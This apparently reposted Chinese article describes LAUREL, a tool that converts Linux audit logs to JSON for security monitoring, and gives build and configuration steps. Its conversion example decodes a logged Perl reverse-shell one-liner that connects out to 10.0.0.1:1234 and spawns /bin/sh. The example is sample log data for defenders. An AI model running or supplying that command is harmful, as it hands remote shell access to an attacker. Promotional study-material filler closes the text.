LAUREL：一款功能强大的Linux事件日志审计和转换工具

关于LAUREL

LAUREL是一款功能强大的Linus事件日志处理插件，可以帮助广大研究人员处理Linux系统事件日志，并对其进行后续处理，以便将日志应用到其他现代安全监控系统之中。

一般来说，Linux审计系统生成的日志文件会包含大量有价值的信息，特别适用于SIEM上下文中。但是原始的日志格式不适用于大规模分析，因为事件通常被分割成不同的行，必须使用消息标识符进行合并。文件和程序执行是通过PATH和EXECVE元素记录的，但字符串的有限字符集将导致许多条目采用十六进制编码。

LAUREL会对这些数据进行解析，并将其转换为基于JSON的日志格式，同时保留原始审计日志中的所有信息。

原始审计事件日志格式如下 ：

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

将其转换为JSON格式后如下 ：

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

工具安装

源码构建

LAUREL基于Rust开发，如需构建项目源码，首先需要在本地设备上安装并配置好一个Rust编译器，以及cargo、libacl库及其头文件（Debian：libacl1-dev，RedHat：libacl-
devel）。

首先，使用下列命令将该项目源码克隆至本地：

git clone https://github.com/threathunters-io/laurel.git

接下来，运行下列命令即可构建项目代码：

$ cargo build --release

$ sudo install -m755 target/release/laurel /usr/local/sbin/laurel

工具配置&使用

创建一个专用用户：

$ sudo useradd --system --home-dir /var/log/laurel --create-home _laurel

配置LAUREL：将项目提供的带注释[ 示例文件](https://github.com/threathunters-
io/laurel/blob/master/etc/laurel/config.toml)拷贝到/etc/laurel/config.toml，并对其进行自定义配置。

将LAUREL注册为一个audisp插件：将提供的[ 示例文件](https://github.com/threathunters-
io/laurel/blob/master/etc/audit/plugins.d/laurel.conf)拷贝到/etc/audisp/plugins.d/laurel.conf或/etc/audit/plugins.d/laurel.conf，具体取决于审计器版本。

如果你使用的是SELinux，则需要编译策略文件并将其安装到运行的内核中：

$ make -C contrib/selinux

$ sudo semodule -i contrib/selinux/laurel.pp

$ sudo restorecon -v -R -F /usr/local/sbin/laurel /etc/laurel /var/log/laurel

最后，部署并应用配置：

$ sudo pkill -HUP auditd

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话，可以在文末下载（无偿的），大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程：

上述资料【扫下方二维码】就可以领取了，无偿分享